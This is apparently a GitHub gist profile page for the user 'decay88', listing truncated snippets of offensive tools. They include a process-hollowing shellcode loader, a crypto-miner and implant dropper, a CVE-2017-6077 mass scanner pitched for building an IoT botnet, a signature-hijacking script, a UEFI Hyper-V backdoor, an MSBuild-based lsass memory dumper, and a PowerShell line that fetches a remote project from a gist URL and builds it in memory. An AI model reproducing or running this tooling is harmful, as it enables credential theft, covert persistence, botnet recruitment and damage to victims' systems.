Skip to content

Instantly share code, notes, and snippets.

View decay88's full-sized avatar

decay88

149 followers · 387 following
View GitHub Profile
@decay88
decay88 / RtelSetProcessIsCritical.cs
Created September 2, 2018 06:38 — forked from Souhardya/RtelSetProcessIsCritical.cs
// BSOD Via RtelSetProcessIsCritical by Souhardya Sardar @subversionzero
// https://www.opensc.io/showthread.php?t=12868&page=2
using System;
using System.Runtime.InteropServices;
namespace Die
{
class Program
@decay88
decay88 / RunPe.cs
Created September 2, 2018 06:39
Shellcode RunPe
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Diagnostics;
// Author : Souhardya Sardar
// Date : 13/01/2017
public class RunPE
{
@decay88
decay88 / wmicminer.ps1
Created September 2, 2018 06:41
Custom implant dropper
# Crypto miner dropper or you can modify it to drop your implants
# Read the code if you want to figure it out
param(
[Parameter(Position = 0)]
[string[]]$Url,
[string]$64Url
)
@decay88
decay88 / MassCVE-2017-6077.py
Created September 2, 2018 06:42 — forked from Souhardya/MassCVE-2017-6077.py
CVE-2017-6077 Mass Scanner easy bots for your iot botnet
import threading
import requests
import re
import sys
#CVE LINK :- https://www.exploit-db.com/exploits/41394/
#CVE AUTHOR :- SivertPL
if len(sys.argv) < 3:
print \
@decay88
decay88 / DigitalSignature-Hijack.ps1
Created September 2, 2018 06:46 — forked from netbiosX/DigitalSignature-Hijack.ps1
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@decay88
decay88 / base64_encode.js
Last active September 2, 2018 10:08 — forked from mrpapercut/base64_encode.js
base64_encoder.js
const base64_chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' +
'abcdefghijklmnopqrstuvwxyz' +
'0123456789+/';
const base64_encode = (input) => {
let length = input.length;
let [i, j, k, s] = [0, 0, 0, 0];
let char_array_3 = new Array(3);
@decay88
decay88 / DmaHvBackdoor.c
Created September 2, 2018 17:38
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@decay88
decay88 / MSBuildProcDumper.csproj
Created September 2, 2018 17:44
MSBuild - Process Dumper - lsass example
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
@decay88
decay88 / Build_In_Memory_CSharp_Project.txt
Created September 2, 2018 17:45
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj");
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.Build();
@decay88
decay88 / evil.cs
Created September 2, 2018 18:14
Execute a DLL via Regsvr32
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{